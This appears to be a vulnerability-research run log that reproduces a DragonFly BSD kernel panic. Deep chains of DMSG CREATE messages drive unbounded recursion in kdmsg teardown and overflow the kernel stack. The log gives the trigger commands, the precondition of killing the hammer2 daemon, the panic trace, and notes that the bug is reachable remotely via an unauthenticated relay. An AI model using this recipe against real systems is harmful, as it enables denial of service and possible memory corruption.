DF-0017 / run.log

============================================================
 DF-0017 — DECISIVE RUN LOG (full, untrimmed)
============================================================
Guest: DragonFly v6.5.0.1712.g89e6a-DEVELOPMENT (master DEV, X86_64_GENERIC)
Setup: /boot/loader.conf has console="comconsole" so the kernel panic +
       DDB backtrace land on the QEMU serial line (dfbsd-qemu/boot.log),
       because the default vidconsole is headless (-display none).

PRECONDITION (resolved the prior "inconclusive" blocker):
  The hammer2 userland cluster daemon (pid 68, "hammer2: hammer2
  autoconn_thread") connects every disk's DMSG iocom at boot via
  DIOCRECLUSTER (sbin/hammer2/cmd_service.c:898), leaving each disk
  iocom's reader thread blocked in fp_read() on a pipe to the daemon.
  kdmsg_iocom_reconnect() (sys/kern/kern_dmsg.c:141) then deadlocks
  waiting for that stuck reader to exit.  Killing the daemon breaks the
  pipes, the readers get EOF and exit, msgrd_td becomes NULL, and a
  fresh DIOCRECLUSTER then succeeds.  (Root fs hammer2 mount has its own
  kernel iocom and is unaffected by killing the userland daemon.)

  => run.sh performs:  pkill -9 -x hammer2 ; sleep 2 ; ./trigger 300

============================================================
 CONTROL RUN: depth=5  (shallow chain -- must NOT overflow)
============================================================
$ ./trigger 5
[1] opened /dev/vbd0 fd=3
[2] socketpair sv[4,5]
[2a] creating drain thread
[2b] drain thread started
[2c] issuing DIOCRECLUSTER (recl.fd=4)...
[3] DIOCRECLUSTER ok
[*] DMSG iocom attached; sending 5 chained CREATEs + root DELETE
[4] wrote 5 CREATEs
[5] wrote DELETE root (rv=64); waiting for panic...
[6] survived sleep(3); closing sv[1] to trigger EOF path
[7] survived; no panic observed
TRIGGER_EXIT=0

Guest: up.  dmesg: clean (no panic/fault/kdmsg warnings).
=> depth=5 does NOT panic.  Confirms the panic is depth/recursion-driven.

============================================================
 PANIC RUN: depth=300  (deep chain -- overflows 16 KB stack)
============================================================
$ ./trigger 300
[1] opened /dev/vbd0 fd=3
[2] socketpair sv[4,5]
[2a] creating drain thread
[2b] drain thread started
[2c] issuing DIOCRECLUSTER (recl.fd=4)...
[3] DIOCRECLUSTER ok
[*] DMSG iocom attached; sending 300 chained CREATEs + root DELETE
<<< guest PANICKED here (ssh died mid-run; remaining buffered stdout lost) >>>

--- guest status: down (frozen in DDB) ---
--- panic captured on serial console (dfbsd-qemu/boot.log): ---

login: DOUBLE FAULT

Fatal double fault
rip = 0xffffffff806564d4
rsp = 0xfffff800ab38f000
rbp = 0xfffff800ab38f000
cpuid = 1; lapic id = 1
panic: double fault
cpuid = 1
Trace beginning at frame 0xfffff8004602eec8
dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c 
dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c 
Debugger("panic")

CPU1 stopping CPUs: 0x00000001
 stopped
Stopped at      Debugger+0x7c:  movb    $0,0xbd77f9(%rip)
db> 

=> depth=300 PANICS with a kernel-stack-overflow double fault.
   Reproducible (identical signature on a 2nd fresh reset run; see
   panic.txt).  Guest must be reset via `vm.sh reset`.

============================================================
 CONCLUSION
============================================================
REPRODUCED.  Unbounded recursion in kdmsg_simulate_failure() /
kdmsg_state_dying() (sys/kern/kern_dmsg.c:1346 / :1428) overflows the
16 KB LWKT kernel thread stack when a DMSG peer builds a deep circuit
chain (>= ~hundreds of CREATE messages) and teardown is driven.  Result:
guaranteed kernel panic (double fault) -> full-system DoS.  No guard
page on the LWKT stack, so it is also an (uncontrolled) kernel memory-
corruption primitive.  Reachable locally via DIOCRECLUSTER (root /
operator) or remotely via the unauthenticated HAMMER2 cluster relay
(the hammer2 daemon listens on TCP 987 and relays peer DMSG traffic
into the kernel disk iocom; LNK_AUTH is unimplemented and receive-side
CRC is not verified).